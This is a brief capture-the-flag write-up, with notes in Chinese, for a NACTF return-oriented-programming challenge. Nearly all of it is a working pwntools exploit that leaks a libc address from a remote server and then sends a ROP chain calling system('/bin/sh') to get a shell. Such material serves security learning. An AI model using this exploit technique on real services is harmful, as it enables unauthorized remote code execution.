###### tags: `nactf` # rop(300) - 標準roprop，差在要print出伺服器的libc address - 做法跟leak libc一樣，只是要print出來，ex:print puts_got，再拿值去網站找 ```python= from pwn import * context.arch = 'amd64' l = ELF('/home/test/Desktop/libc6_2.32-0ubuntu2_amd64.so') #y = process("./dro") y= remote("challenges.ctfd.io",30261) pop_rdi = 0x401203 ret = 0x40101a puts_plt = 0x401030 libc_start_main_got = 0x403fe8 puts_got = 0x403fc8 main = 0x401146 p = flat( 'a' * 56, pop_rdi, libc_start_main_got, # puts_got, 找伺服器libc puts_plt, main ) y.sendlineafter('?',p) y.recvline() #print(hex(u64(y.recv(6) + '\0\0'))) 找伺服器libc libc = u64(y.recv(6) + '\0\0') - 0x28bc0 success('libc ->%s' %hex( libc)) #print'libc ->',hex( l.address) #print '"/bin/sh" str:' ,hex( l.search('/bin/sh').next()) system_off = 0x503c0 system_func_ptr = libc + system_off bin_sh = libc + 0x1ae41f p = flat( 'a' * 56, ret, pop_rdi, bin_sh, system_func_ptr ) y.sendlineafter('?',p) y.interactive() ```